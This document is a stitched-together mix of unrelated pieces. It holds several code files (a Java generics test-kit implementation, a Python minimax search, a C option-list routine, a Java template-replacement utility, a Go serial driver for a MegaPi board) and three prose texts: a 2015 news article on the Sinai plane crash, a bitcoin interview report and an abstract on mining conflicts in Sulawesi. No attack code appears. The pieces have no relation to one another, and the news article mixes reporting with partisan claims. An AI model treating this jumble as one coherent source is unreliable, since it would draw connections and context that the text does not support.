/**
 * @author <a href="mailto:[email protected]">Julien Viet</a>
 */
public class GenericsTCKImpl implements GenericsTCK {

  @Override public GenericRefedInterface<Byte> methodWithByteParameterizedReturn() { return methodWithClassTypeParameterizedReturn((byte)123); }
  @Override public GenericRefedInterface<Short> methodWithShortParameterizedReturn() { return methodWithClassTypeParameterizedReturn((short)1234); }
  @Override public GenericRefedInterface<Integer> methodWithIntegerParameterizedReturn() { return methodWithClassTypeParameterizedReturn(123456); }
  @Override public GenericRefedInterface<Long> methodWithLongParameterizedReturn() { return methodWithClassTypeParameterizedReturn(123456789L); }
  @Override public GenericRefedInterface<Float> methodWithFloatParameterizedReturn() { return methodWithClassTypeParameterizedReturn(0.34F); }
  @Override public GenericRefedInterface<Double> methodWithDoubleParameterizedReturn() { return methodWithClassTypeParameterizedReturn(0.314D); }
  @Override public GenericRefedInterface<Boolean> methodWithBooleanParameterizedReturn() { return methodWithClassTypeParameterizedReturn(true); }
  @Override public GenericRefedInterface<Character> methodWithCharacterParameterizedReturn() { return methodWithClassTypeParameterizedReturn('F'); }
  @Override public GenericRefedInterface<String> methodWithStringParameterizedReturn() { return methodWithClassTypeParameterizedReturn("zoumbawe"); }
  @Override public GenericRefedInterface<JsonObject> methodWithJsonObjectParameterizedReturn() { return methodWithClassTypeParameterizedReturn(new JsonObject().put("cheese", "stilton")); }
  @Override public GenericRefedInterface<JsonArray> methodWithJsonArrayParameterizedReturn() { return methodWithClassTypeParameterizedReturn(new JsonArray().add("cheese").add("stilton")); }
  @Override public GenericRefedInterface<TestDataObject> methodWithDataObjectParameterizedReturn() { return methodWithClassTypeParameterizedReturn(new TestDataObject().setWibble(3.14).setFoo("foo_value").setBar(123456)); }
  @Override public GenericRefedInterface<TestEnum> methodWithEnumParameterizedReturn() { return methodWithClassTypeParameterizedReturn(TestEnum.WESTON); }
  @Override public GenericRefedInterface<TestGenEnum> methodWithGenEnumParameterizedReturn() { return methodWithClassTypeParameterizedReturn(TestGenEnum.LELAND); }
  @Override public GenericRefedInterface<RefedInterface1> methodWithUserTypeParameterizedReturn() { return methodWithClassTypeParameterizedReturn(new RefedInterface1Impl().setString("foo")); }

  @Override public void methodWithHandlerByteParameterized(Handler<GenericRefedInterface<Byte>> handler) { handler.handle(methodWithByteParameterizedReturn()); }
  @Override public void methodWithHandlerShortParameterized(Handler<GenericRefedInterface<Short>> handler) { handler.handle(methodWithShortParameterizedReturn()); }
  @Override public void methodWithHandlerIntegerParameterized(Handler<GenericRefedInterface<Integer>> handler) { handler.handle(methodWithIntegerParameterizedReturn()); }
  @Override public void methodWithHandlerLongParameterized(Handler<GenericRefedInterface<Long>> handler) { handler.handle(methodWithLongParameterizedReturn()); }
  @Override public void methodWithHandlerFloatParameterized(Handler<GenericRefedInterface<Float>> handler) { handler.handle(methodWithFloatParameterizedReturn()); }
  @Override public void methodWithHandlerDoubleParameterized(Handler<GenericRefedInterface<Double>> handler) { handler.handle(methodWithDoubleParameterizedReturn()); }
  @Override public void methodWithHandlerBooleanParameterized(Handler<GenericRefedInterface<Boolean>> handler) { handler.handle(methodWithBooleanParameterizedReturn()); }
  @Override public void methodWithHandlerCharacterParameterized(Handler<GenericRefedInterface<Character>> handler) { handler.handle(methodWithCharacterParameterizedReturn()); }
  @Override public void methodWithHandlerStringParameterized(Handler<GenericRefedInterface<String>> handler) { handler.handle(methodWithStringParameterizedReturn()); }
  @Override public void methodWithHandlerJsonObjectParameterized(Handler<GenericRefedInterface<JsonObject>> handler) { handler.handle(methodWithJsonObjectParameterizedReturn()); }
  @Override public void methodWithHandlerJsonArrayParameterized(Handler<GenericRefedInterface<JsonArray>> handler) { handler.handle(methodWithJsonArrayParameterizedReturn()); }
  @Override public void methodWithHandlerDataObjectParameterized(Handler<GenericRefedInterface<TestDataObject>> handler) { handler.handle(methodWithDataObjectParameterizedReturn()); }
  @Override public void methodWithHandlerEnumParameterized(Handler<GenericRefedInterface<TestEnum>> handler) { handler.handle(methodWithEnumParameterizedReturn()); }
  @Override public void methodWithHandlerGenEnumParameterized(Handler<GenericRefedInterface<TestGenEnum>> handler) { handler.handle(methodWithGenEnumParameterizedReturn()); }
  @Override public void methodWithHandlerUserTypeParameterized(Handler<GenericRefedInterface<RefedInterface1>> handler) { handler.handle(methodWithUserTypeParameterizedReturn()); }

  @Override public void methodWithHandlerAsyncResultByteParameterized(Handler<AsyncResult<GenericRefedInterface<Byte>>> handler) { handler.handle(Future.succeededFuture(methodWithByteParameterizedReturn())); }
  @Override public void methodWithHandlerAsyncResultShortParameterized(Handler<AsyncResult<GenericRefedInterface<Short>>> handler) { handler.handle(Future.succeededFuture(methodWithShortParameterizedReturn())); }
  @Override public void methodWithHandlerAsyncResultIntegerParameterized(Handler<AsyncResult<GenericRefedInterface<Integer>>> handler) { handler.handle(Future.succeededFuture(methodWithIntegerParameterizedReturn())); }
  @Override public void methodWithHandlerAsyncResultLongParameterized(Handler<AsyncResult<GenericRefedInterface<Long>>> handler) { handler.handle(Future.succeededFuture(methodWithLongParameterizedReturn())); }
  @Override public void methodWithHandlerAsyncResultFloatParameterized(Handler<AsyncResult<GenericRefedInterface<Float>>> handler) { handler.handle(Future.succeededFuture(methodWithFloatParameterizedReturn())); }
  @Override public void methodWithHandlerAsyncResultDoubleParameterized(Handler<AsyncResult<GenericRefedInterface<Double>>> handler) { handler.handle(Future.succeededFuture(methodWithDoubleParameterizedReturn())); }
  @Override public void methodWithHandlerAsyncResultBooleanParameterized(Handler<AsyncResult<GenericRefedInterface<Boolean>>> handler) { handler.handle(Future.succeededFuture(methodWithBooleanParameterizedReturn())); }
  @Override public void methodWithHandlerAsyncResultCharacterParameterized(Handler<AsyncResult<GenericRefedInterface<Character>>> handler) { handler.handle(Future.succeededFuture(methodWithCharacterParameterizedReturn())); }
  @Override public void methodWithHandlerAsyncResultStringParameterized(Handler<AsyncResult<GenericRefedInterface<String>>> handler) { handler.handle(Future.succeededFuture(methodWithStringParameterizedReturn())); }
  @Override public void methodWithHandlerAsyncResultJsonObjectParameterized(Handler<AsyncResult<GenericRefedInterface<JsonObject>>> handler) { handler.handle(Future.succeededFuture(methodWithJsonObjectParameterizedReturn())); }
  @Override public void methodWithHandlerAsyncResultJsonArrayParameterized(Handler<AsyncResult<GenericRefedInterface<JsonArray>>> handler) { handler.handle(Future.succeededFuture(methodWithJsonArrayParameterizedReturn())); }
  @Override public void methodWithHandlerAsyncResultDataObjectParameterized(Handler<AsyncResult<GenericRefedInterface<TestDataObject>>> handler) { handler.handle(Future.succeededFuture(methodWithDataObjectParameterizedReturn())); }
  @Override public void methodWithHandlerAsyncResultEnumParameterized(Handler<AsyncResult<GenericRefedInterface<TestEnum>>> handler) { handler.handle(Future.succeededFuture(methodWithEnumParameterizedReturn())); }
  @Override public void methodWithHandlerAsyncResultGenEnumParameterized(Handler<AsyncResult<GenericRefedInterface<TestGenEnum>>> handler) { handler.handle(Future.succeededFuture(methodWithGenEnumParameterizedReturn())); }
  @Override public void methodWithHandlerAsyncResultUserTypeParameterized(Handler<AsyncResult<GenericRefedInterface<RefedInterface1>>> handler) { handler.handle(Future.succeededFuture(methodWithUserTypeParameterizedReturn())); }

  @Override public void methodWithFunctionParamByteParameterized(Function<GenericRefedInterface<Byte>, String> handler) { handler.apply(methodWithByteParameterizedReturn()); }
  @Override public void methodWithFunctionParamShortParameterized(Function<GenericRefedInterface<Short>, String> handler) { handler.apply(methodWithShortParameterizedReturn()); }
  @Override public void methodWithFunctionParamIntegerParameterized(Function<GenericRefedInterface<Integer>, String> handler) { handler.apply(methodWithIntegerParameterizedReturn()); }
  @Override public void methodWithFunctionParamLongParameterized(Function<GenericRefedInterface<Long>, String> handler) { handler.apply(methodWithLongParameterizedReturn()); }
  @Override public void methodWithFunctionParamFloatParameterized(Function<GenericRefedInterface<Float>, String> handler) { handler.apply(methodWithFloatParameterizedReturn()); }
  @Override public void methodWithFunctionParamDoubleParameterized(Function<GenericRefedInterface<Double>, String> handler) { handler.apply(methodWithDoubleParameterizedReturn()); }
  @Override public void methodWithFunctionParamBooleanParameterized(Function<GenericRefedInterface<Boolean>, String> handler) { handler.apply(methodWithBooleanParameterizedReturn()); }
  @Override public void methodWithFunctionParamCharacterParameterized(Function<GenericRefedInterface<Character>, String> handler) { handler.apply(methodWithCharacterParameterizedReturn()); }
  @Override public void methodWithFunctionParamStringParameterized(Function<GenericRefedInterface<String>, String> handler) { handler.apply(methodWithStringParameterizedReturn()); }
  @Override public void methodWithFunctionParamJsonObjectParameterized(Function<GenericRefedInterface<JsonObject>, String> handler) { handler.apply(methodWithJsonObjectParameterizedReturn()); }
  @Override public void methodWithFunctionParamJsonArrayParameterized(Function<GenericRefedInterface<JsonArray>, String> handler) { handler.apply(methodWithJsonArrayParameterizedReturn()); }
  @Override public void methodWithFunctionParamDataObjectParameterized(Function<GenericRefedInterface<TestDataObject>, String> handler) { handler.apply(methodWithDataObjectParameterizedReturn()); }
  @Override public void methodWithFunctionParamEnumParameterized(Function<GenericRefedInterface<TestEnum>, String> handler) { handler.apply(methodWithEnumParameterizedReturn()); }
  @Override public void methodWithFunctionParamGenEnumParameterized(Function<GenericRefedInterface<TestGenEnum>, String> handler) { handler.apply(methodWithGenEnumParameterizedReturn()); }
  @Override public void methodWithFunctionParamUserTypeParameterized(Function<GenericRefedInterface<RefedInterface1>, String> handler) { handler.apply(methodWithUserTypeParameterizedReturn()); }

  @Override
  public <U> GenericRefedInterface<U> methodWithClassTypeParameterizedReturn(Class<U> type) {
    if (type == Byte.class) { return (GenericRefedInterface<U>) methodWithByteParameterizedReturn(); }
    if (type == Short.class) { return (GenericRefedInterface<U>) methodWithShortParameterizedReturn(); }
    if (type == Integer.class) { return (GenericRefedInterface<U>) methodWithIntegerParameterizedReturn(); }
    if (type == Long.class) { return (GenericRefedInterface<U>) methodWithLongParameterizedReturn(); }
    if (type == Float.class) { return (GenericRefedInterface<U>) methodWithFloatParameterizedReturn(); }
    if (type == Double.class) { return (GenericRefedInterface<U>) methodWithDoubleParameterizedReturn(); }
    if (type == Boolean.class) { return (GenericRefedInterface<U>) methodWithBooleanParameterizedReturn(); }
    if (type == Character.class) { return (GenericRefedInterface<U>) methodWithCharacterParameterizedReturn(); }
    if (type == String.class) { return (GenericRefedInterface<U>) methodWithStringParameterizedReturn(); }
    if (type == JsonObject.class) { return (GenericRefedInterface<U>) methodWithJsonObjectParameterizedReturn(); }
    if (type == JsonArray.class) { return (GenericRefedInterface<U>) methodWithJsonArrayParameterizedReturn(); }
    if (type == TestDataObject.class) { return (GenericRefedInterface<U>) methodWithDataObjectParameterizedReturn(); }
    if (type == TestEnum.class) { return (GenericRefedInterface<U>) methodWithEnumParameterizedReturn(); }
    if (type == TestGenEnum.class) { return (GenericRefedInterface<U>) methodWithGenEnumParameterizedReturn(); }
    if (type == RefedInterface1.class) { return (GenericRefedInterface<U>) methodWithUserTypeParameterizedReturn(); }
    throw new AssertionError("Unexpected type " + type);
  }

  @Override public <U> U methodWithClassTypeReturn(Class<U> type) { return methodWithClassTypeParameterizedReturn(type).getValue(); }

  @Override
  public <U> void methodWithClassTypeParam(Class<U> type, U u) {
    GenericRefedInterface<U> gen = methodWithClassTypeParameterizedReturn(type);
    if (!u.equals(gen.getValue())) {
      throw new AssertionError("Unexpected value " + u + "/" + u.getClass() + " != " + gen.getValue() + "/" + gen.getValue().getClass());
    }
  }

  @Override public <U> void methodWithClassTypeHandler(Class<U> type, Handler<U> f) { f.handle(methodWithClassTypeReturn(type)); }
  @Override public <U> void methodWithClassTypeHandlerAsyncResult(Class<U> type, Handler<AsyncResult<U>> f) { f.handle(Future.succeededFuture(methodWithClassTypeReturn(type))); }
  @Override public <U> void methodWithClassTypeFunctionParam(Class<U> type, Function<U, String> f) { f.apply(methodWithClassTypeReturn(type)); }
  @Override public <U> void methodWithClassTypeFunctionReturn(Class<U> type, Function<String, U> f) { methodWithClassTypeParam(type, f.apply("whatever")); }
  @Override public <U> void methodWithHandlerClassTypeParameterized(Class<U> type, Handler<GenericRefedInterface<U>> handler) { handler.handle(methodWithClassTypeParameterizedReturn(type)); }
  @Override public <U> void methodWithHandlerAsyncResultClassTypeParameterized(Class<U> type, Handler<AsyncResult<GenericRefedInterface<U>>> handler) { handler.handle(Future.succeededFuture(methodWithClassTypeParameterizedReturn(type))); }
  @Override public <U> void methodWithFunctionParamClassTypeParameterized(Class<U> type, Function<GenericRefedInterface<U>, String> function) { function.apply(methodWithClassTypeParameterizedReturn(type)); }

  private <U> GenericRefedInterface<U> methodWithClassTypeParameterizedReturn(U val) {
    GenericRefedInterfaceImpl<U> obj = new GenericRefedInterfaceImpl<>();
    obj.setValue(val);
    return obj;
  }

  @Override
  public InterfaceWithApiArg interfaceWithApiArg(RefedInterface1 value) {
    return new InterfaceWithApiArg() {
      private RefedInterface1 val = value;
      @Override public void meth() { }
      @Override public GenericRefedInterface<RefedInterface1> setValue(RefedInterface1 value) { val = value; return this; }
      @Override public RefedInterface1 getValue() { return val; }
    };
  }

  @Override
  public InterfaceWithStringArg interfaceWithStringArg(String value) {
    return new InterfaceWithStringArg() {
      private String val = value;
      @Override public void meth() { }
      @Override public GenericRefedInterface<String> setValue(String value) { val = value; return this; }
      @Override public String getValue() { return val; }
    };
  }

  @Override
  public <T, U> InterfaceWithVariableArg<T, U> interfaceWithVariableArg(T value1, Class<U> type, U value2) {
    return new InterfaceWithVariableArg<T, U>() {
      private T val1 = value1;
      private U val2 = value2;
      @Override public void setOtherValue(T value) { val1 = value; }
      @Override public T getOtherValue() { return val1; }
      @Override public GenericRefedInterface<U> setValue(U value) { val2 = value; return this; }
      @Override public U getValue() { return val2; }
    };
  }

  @Override
  public GenericNullableRefedInterface<RefedInterface1> methodWithGenericNullableApiReturn(boolean notNull) {
    return new GenericNullableRefedInterface<RefedInterface1>() {
      @Override public RefedInterface1 getValue() { return notNull ? new RefedInterface1Impl().setString("the_string_value") : null; }
    };
  }

  @Override public void methodWithHandlerGenericNullableApi(boolean notNull, Handler<GenericNullableRefedInterface<RefedInterface1>> handler) { handler.handle(methodWithGenericNullableApiReturn(notNull)); }
  @Override public void methodWithHandlerAsyncResultGenericNullableApi(boolean notNull, Handler<AsyncResult<GenericNullableRefedInterface<RefedInterface1>>> handler) { handler.handle(Future.succeededFuture(methodWithGenericNullableApiReturn(notNull))); }
  @Override public <T> GenericRefedInterface<T> methodWithParamInferedReturn(GenericRefedInterface<T> param) { return param; }
  @Override public <T> void methodWithHandlerParamInfered(GenericRefedInterface<T> param, Handler<GenericRefedInterface<T>> handler) { handler.handle(param); }
  @Override public <T> void methodWithHandlerAsyncResultParamInfered(GenericRefedInterface<T> param, Handler<AsyncResult<GenericRefedInterface<T>>> handler) { handler.handle(Future.succeededFuture(param)); }
}
/**
 * Parses a language tag list.
 *
 * @param langs the language tag list to be parsed
 *
 * @return a list of language tags parsed from {@code langs}, sorted by descending
 * <a href="https://developer.mozilla.org/en-US/docs/Glossary/quality_values">quality value</a>
 *
 * @throws NullPointerException if {@code langs} is null
 */
public static List<String> langs(final CharSequence langs) {

    if ( langs == null ) {
        throw new NullPointerException("null langs");
    }

    return values(langs, LangPattern);
}
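A short usage sketch, inferred from the Javadoc contract above. The values helper and the LangPattern constant are defined elsewhere and not shown here, so the exact result is an assumption based on the documented sorting behavior rather than verified output:

// Tags come back sorted by descending quality value, so "fr" (q=0.9)
// is expected to precede "en" (q=0.7).
List<String> tags = langs("en;q=0.7, fr;q=0.9"); // assumed: ["fr", "en"]
langs(null); // throws NullPointerException, per the @throws clause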
def minimax_endgame_search(state, maximize=True):
    """Exhaustive minimax to the endgame. Returns the best
    (path, score, static_eval_count) tuple for the given state."""
    # Accept a bare state on the initial call; internally the queue holds
    # paths (lists of states from the root to the frontier).
    if type(state) != list:
        state = [[state]]
    leaf_node = []
    static_eval_count = 0
    while state:
        path = state.pop(0)
        if path[-1].is_game_over():
            score = path[-1].get_endgame_score(maximize)
            leaf_node.append((path, score, 1))
        else:
            children = path[-1].generate_next_states()
            new_path = []
            for child in children:
                temp_path = path.copy()
                temp_path.append(child)
                new_path.append(temp_path)
            # Recurse over all children with the roles swapped; the call
            # collapses that subtree into a single (path, score, count) tuple.
            leaf_node.append(minimax_endgame_search(new_path, not maximize))
    # Total static evaluations performed across this subtree.
    for leaf in leaf_node:
        static_eval_count += leaf[2]
    new_leaf = []
    for leaf in leaf_node:
        new_leaf.append((leaf[0], leaf[1], static_eval_count))
    # The candidates here are siblings one ply below the caller, so the choice
    # among them belongs to the player who moved at the caller's level: when
    # this call's `maximize` flag is False, the (maximizing) parent picks the
    # max, and vice versa. The apparent inversion is deliberate.
    if not maximize:
        return max(new_leaf, key=lambda leaf: leaf[1])
    else:
        return min(new_leaf, key=lambda leaf: leaf[1])
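A small usage sketch on a hypothetical game tree. Node is a stand-in for whatever state class supplies is_game_over, get_endgame_score, and generate_next_states in the real code (here it ignores the maximize flag that a real scorer would use):

# A tiny two-ply tree: the maximizer can take an immediate 3, or enter a
# subtree where the minimizer would hold it to min(5, 1) = 1.
class Node:
    def __init__(self, score=None, children=()):
        self.score = score
        self.children = list(children)

    def is_game_over(self):
        return not self.children

    def get_endgame_score(self, maximize=True):
        return self.score  # a real implementation would use `maximize`

    def generate_next_states(self):
        return self.children

root = Node(children=[Node(score=3),
                      Node(children=[Node(score=5), Node(score=1)])])
best_path, best_score, evals = minimax_endgame_search(root, maximize=True)
print(best_score, evals)  # 3 3 -- three leaves statically evaluated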
/*
** Find any duplicates in the arguments and either print an error
** if there is one or create/add another variable option.
*/

void	add_option(t_arg *args, t_opt **options, t_opt *new)
{
	t_opt	*opt;

	if (options && *options && has_duplicates(options, new)
		&& strcmp(new->name, "_unknown"))
	{
		fprintf(stderr, "error: Singular option already set [%s]\n", new->name);
		free_options(options);
		free_options(&new);
		free_args(args);
		exit(EXIT_FAILURE);
	}
	if (length_options(options) > 0)
	{
		opt = *options;
		while (opt->next)
			opt = opt->next;
		opt->next = new;
	}
	else
		*options = new;
}
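For reference, a hypothetical shape of the option node that add_option appears to assume; the project's real t_opt (and t_arg) definitions live in its own headers and may differ. Only the fields the function actually touches are shown:

/*
** Hypothetical sketch of t_opt: a singly linked list of named options,
** appended to at the tail by add_option above.
*/
typedef struct		s_opt
{
	char			*name;
	struct s_opt	*next;
}					t_opt;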
def _file_fix(self, filepath, prefix=None, suffix=None):
    # Rewrite `filepath` in place, optionally wrapping its contents with a
    # prefix and/or suffix. The temp file lives in the same directory so the
    # final move stays on one filesystem. NamedTemporaryFile opens in binary
    # mode, so `prefix`/`suffix` must be bytes and the source is read as 'rb'.
    with tempfile.NamedTemporaryFile(dir=self.working_path, delete=False) as outfile:
        if prefix:
            outfile.write(prefix)
        with open(filepath, 'rb') as infile:
            shutil.copyfileobj(infile, outfile)
        if suffix:
            outfile.write(suffix)
    shutil.move(outfile.name, filepath)
Two days on, no clear explanation for downing of Russian plane over Sinai

By Thomas Gaist
3 November 2015

The cause of the destruction of a Russian commercial airliner Saturday over Egypt remains unclear. The plane fell in pieces in the war-torn region of Hasana in northern Sinai, killing all 224 people on board. The jetliner crashed to earth in a state of disintegration, having largely broken up in midair and scattering debris over a wide area.

The Islamic State (IS) affiliate in the Sinai Peninsula claimed responsibility for the attack on Saturday. These claims prompted immediate expressions of skepticism from Egyptian and Russian officials. ISIS is not known to possess anti-aircraft weapons with sufficient range to carry out an attack against a jet flying at cruising altitude, according to officials and experts cited in Western media.

Some military analysts have suggested that the available evidence points to a bomb planted inside the plane's hold, saying that an attack could have been similar to the one that destroyed Pan Am Flight 103, a Boeing 747, over Lockerbie, Scotland in 1988. Some reports in the Russian media have suggested that the plane may have been destroyed by a mechanical failure resulting from poor maintenance, with reports circulating of a pre-flight phone call in which the pilot worried to his wife about the condition of the aircraft.

Metrojet, the company servicing the flight, has maintained that the plane was destroyed by some "external" cause, saying that its own investigation has ruled out a mechanical failure as the reason. "We rule out technical fault of the plane or the pilot's error; the only explainable cause is physical impact on the aircraft," Metrojet executive Alexander Smirnov said.

The company's claims are predictable, given the immense financial interests at stake. Aviation experts have already criticized Metrojet, however, saying that the company's claims were advanced far too quickly and without any basis in evidence.

"That statement is premature and is based on no real facts," Alexander Neradko of Russia's Air Transport Agency told Egyptian media on Monday. "We know that components of the plane have been thrown over a wide area. That says the breakup took place in the air, at a high altitude. But it is very premature to talk about the reasons," Neradko said.

"I am surprised that an airline manager, at the point that we are at in this investigation, would make a statement like that," said Robert Francis, a former official with the National Transportation Safety Board in the United States. "Without the flight recorders having been read, and without more investigation of the fuselage, which is spread all over the place, I don't think you can rule out anything," Francis said.

While a number of international carriers have suspended flights over the area, others have not. US-based carrier United Airlines has continued routing flights over the Sinai, saying that the company "sees no need" to stop the flights.

Given the timing and the nationality of the jet, coming amidst a major escalation of Russia's military presence in Syria, an attack on the plane is a definite possibility. Russian actions in Syria have been directed at a number of US-backed terrorist groups, variously affiliated with factions of al Qaeda, that have been built up by Washington as part of efforts to overthrow the government of Bashar al-Assad. These groups have been armed to the teeth by the US and its allies, and have received more advanced weaponry since the onset of Russia's military campaign in Syria.
ISIS is itself an offshoot of the US-backed civil war in Syria.

Russian leaders have clearly been concerned to muffle speculation along these lines. Russian President Vladimir Putin called the incident a "great tragedy," and called for investigators to outline an "objective picture" of the crash.

The US government, usually the first to play the terrorist card under these circumstances, has sounded a noticeably more muted tone. On Monday, US Director of National Intelligence James Clapper made remarks downplaying claims that IS militants were behind the incident. "It's unlikely, but I wouldn't rule it out. We don't have any direct evidence of any terrorist involvement, yet," Clapper said.

Whatever its origins, the incident will likely deal a further blow to Egypt's tourism sector, which has already contracted by some 20 percent this year. The industry was already reeling from an incident earlier this year, when Mexican tourists traveling in a caravan in Egypt's Western Desert were killed by an Egyptian military helicopter.
Raj Date, the former Deputy Director of the US Consumer Financial Protection Bureau (CFPB), a consumer finance watchdog, said in an interview this week that he supports – and is now investing in – bitcoin.

During a segment of Bloomberg Television's "Street Smart," Date commented that, on a personal level, he sees a lot of potential in digital currencies like bitcoin. "The thing I like about innovation in consumer finance, like bitcoin, like digital currency, is exactly the same reason I went to the CFPB. How is it that you can take new ideas and make the system work better for people?"

Pros and cons

Date currently serves on the board of directors for bitcoin startup Circle Internet Financial. He is also the founder and managing director of Washington, D.C.-based investment firm Fenway Summer.

In the interview, Date said that bitcoin has the potential to deliver faster and more secure payments than is currently possible for most consumers, and remarked that the pace of innovation could result in a broader evolution in digital currencies. Date said: "It's entirely possible that there will be variants of other digital currencies, entirely possible that the form of bitcoin will continue to be developed and improved over time."

He continued: "The fact of the matter is that anything that actually solves the problems of consumers and merchants is, in my mind, a good thing."

Looking ahead

Date also pointed to the evolution of the bitcoin business ecosystem as a positive development, holding up the liquidation of Mt. Gox as a sign that companies in the space are maturing. He said: "The new firms in this marketplace are considerably more serious-minded, considerably better financed and take these things seriously."

This industry transition was on display last week at Inside Bitcoins NYC. For more on that event, read our full report.

Image via Wikipedia
The Dynamic of Social Relations and Conflicts in Mining Areas in Indonesia: A Study of Mining in Bahodopi, Morowali, Central Sulawesi

The study of socio-cultural institutions in natural resource management involves two dimensions: the ipso facto (based on fact), namely management of an area as marked by the presence of people carrying out activities there, and the ipso jure (based on law), namely management grounded in positive law. This article analyzes the socio-cultural principles lived by the community in Bahodopi District, Morowali Regency, in response to changes in their lives. The results show that the dynamics of community life after the arrival of mining in Bahodopi have had broad implications for social life. Empirically, the study shows that the conflicts that arise are dominated by conflicts between migrants and local residents, and between local communities and the companies. The conflicts raised by the community are of low escalation but have a broad impact on the sustainability and existence of investment. The interaction of cultures with different perspectives is typical of such areas, yet it has the potential to create conflict and even violence if it is not appropriately managed. Differing socio-cultural backgrounds become a trigger for disharmony in the community when they cannot be properly managed. That the conflicts that occur mainly pit two ethnic entities against each other is an irony in a setting shaped by capitalist investment.
/**
 * This class takes a template string that refers to positional
 * parameters as well as a sequence of argument values and
 * returns a string in which the parameter references have been
 * replaced by actual values.
 *
 * The parameter references are 0-based and written as decimal numbers
 * enclosed by curly braces.
 *
 * An {@link IllegalArgumentException} occurs if the template
 * string contains a negative reference or a reference outside the
 * bounds of the argument array. This exception type also occurs
 * on lower-level syntax errors, e.g. if the parameter reference
 * is not a number or if braces are not properly matched.
 *
 * The arguments array reference must not be null even if there is
 * not a single parameter reference.
 */
public class StringParameterReplaceUtil {

	/**
	 * Prevent instantiation.
	 */
	private StringParameterReplaceUtil() {
	}

	/**
	 * Replaces parameter references in the specified template string and returns the result.
	 * @param template the template string
	 * @param arguments the argument sequence
	 * @return the result
	 */
	public static String replace(String template, String... arguments) {

		/** check for a null argument array **/
		if (arguments == null) {
			throw new IllegalArgumentException("arguments array reference is null");
		}

		/** build the result string **/
		StringBuilder resultBuilder = new StringBuilder();
		int index = 0;
		while (true) {
			int openingBraceIndex = template.indexOf('{', index);
			int closingBraceIndex = template.indexOf('}', index);

			/** case: no more parameter references **/
			if (openingBraceIndex == -1 && closingBraceIndex == -1) {
				resultBuilder.append(template, index, template.length());
				break;
			}

			/** case: mismatched braces (either only opening or only closing brace found) **/
			if (openingBraceIndex == -1 || closingBraceIndex == -1) {
				throw new IllegalArgumentException("invalid template string: [" + template + "]");
			}

			/** case: mismatched braces (they appear in the wrong order) **/
			if (openingBraceIndex > closingBraceIndex) {
				throw new IllegalArgumentException("invalid template string: [" + template + "]");
			}

			/** copy characters up to the opening brace **/
			resultBuilder.append(template, index, openingBraceIndex);

			/** parse the parameter index (may fail if not a number) **/
			String parameterReferenceText = template.substring(openingBraceIndex + 1, closingBraceIndex);
			int parameterIndex;
			try {
				parameterIndex = Integer.parseInt(parameterReferenceText);
			} catch (NumberFormatException e) {
				throw new IllegalArgumentException("invalid parameter reference [" + parameterReferenceText + "] in template string: [" + template + "]");
			}

			/** make sure the index is within the bounds of the argument array **/
			if (parameterIndex < 0 || parameterIndex >= arguments.length) {
				throw new IllegalArgumentException("parameter index [" + parameterIndex + "] out of bounds; number of arguments: [" + arguments.length + "]");
			}

			/** the reference is valid, so copy the argument and skip the reference **/
			resultBuilder.append(arguments[parameterIndex]);
			index = closingBraceIndex + 1;
		}
		return resultBuilder.toString();
	}
}
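A short usage example, grounded directly in the behavior of the code above:

String s = StringParameterReplaceUtil.replace("Hello {0}, you have {1} new messages, {0}!", "Ada", "3");
// s is "Hello Ada, you have 3 new messages, Ada!"

// Each of the following throws an IllegalArgumentException:
// StringParameterReplaceUtil.replace("{2}", "a", "b"); // index out of bounds
// StringParameterReplaceUtil.replace("{x}", "a");      // reference is not a number
// StringParameterReplaceUtil.replace("oops}", "a");    // mismatched braces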
// Copyright (c) 2020 Author Name. All rights reserved.
// Use of this source code is governed by the Apache License, Version 2.0
// that can be found in the LICENSE file.
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

package drivers

import (
	"io"
	"log"

	"github.com/jacobsa/go-serial/serial"
)

type serialState struct {
	Buff     [12]byte
	recvBuff [12]byte
	start    bool
	discard  bool
	head     byte
	tail     byte
	counter  int
	length   int
	Complete bool
	err      error
	prevByte byte
	port     io.ReadWriteCloser
}

// SerialState is the driver object to be used for communicating with
// the MegaPi control board.
var SerialState serialState

// OpenOptions is the options object for the serial interface.
type OpenOptions = serial.OpenOptions

func (s *serialState) Open(options serial.OpenOptions) {
	s.start = false
	s.prevByte = 0x00
	s.discard = false
	s.head = 0x00
	s.tail = 0x00
	s.counter = -1
	s.length = 0
	s.Complete = false
	s.Buff = [12]byte{}
	s.recvBuff = [12]byte{}
	s.port, s.err = serial.Open(options)
	if s.err != nil {
		log.Fatalf("port.Open: %v", s.err)
	}
}

func (s *serialState) Write(msg [8]byte) (bytesWritten int, err error) {
	return s.port.Write(msg[:])
}

// Read pulls bytes from the port until a complete frame has been parsed or
// the current frame is discarded. It returns the byte count of the last
// port read.
func (s *serialState) Read() (bytesRead int, err error) {
	var n int
	for {
		tslice := s.recvBuff[:]
		// Use '=' so the enclosing n and err are updated; a ':=' here would
		// shadow them and make Read always return 0.
		n, err = s.port.Read(tslice)
		if err != nil {
			s.err = err
			log.Fatalf("port.Read: %v", err)
		}
		s.parseIncoming(n)
		if s.Complete || s.discard {
			break
		}
	}
	return n, err
}

func (s *serialState) Result(n int) (buff []byte) {
	return s.Buff[0:n]
}

func (s *serialState) Close() {
	// not yet implemented
	// s.port.Close()
}

func (s *serialState) parseIncoming(n int) {
	for i := 0; i < n; i++ {
		s.parseSerialByte(s.recvBuff[i])
		if s.discard {
			break
		}
	}
}

func (s *serialState) incrementAndStore(recvByte byte) {
	s.counter++
	s.Buff[s.counter] = recvByte
}

/**************************************************
 ff 55 len idx ... cr(0d) nl(0a)
 0  1  2   3   n   n+1    n+2
***************************************************/
func (s *serialState) parseSerialByte(recvByte byte) {
	selected := true
	switch {
	// confirm full start sequence
	case recvByte == 0x55 && s.prevByte == 0xff:
		s.discard = false
		s.counter = -1
		s.incrementAndStore(s.prevByte)
		s.Complete = false
		s.counter = 0
	// end of frame: cr followed by nl
	case recvByte == 10 && s.prevByte == 13:
		selected = false
		s.counter = -1
	// all other bytes
	default:
		s.tail = 0
		s.head = 0
		if s.counter == 2 {
			// register length
			s.length = int(recvByte)
		} else if s.counter == 1 {
			// register id
		} else if s.length > 1 {
			s.length--
		} else if s.length == 1 {
			s.length = 0
			s.Complete = true
		} else {
			selected = false
			s.counter = -1
		}
	}
	if selected {
		s.incrementAndStore(recvByte)
		if s.Complete {
			s.counter = -1
		}
	}
	s.prevByte = recvByte
	s.err = nil
}
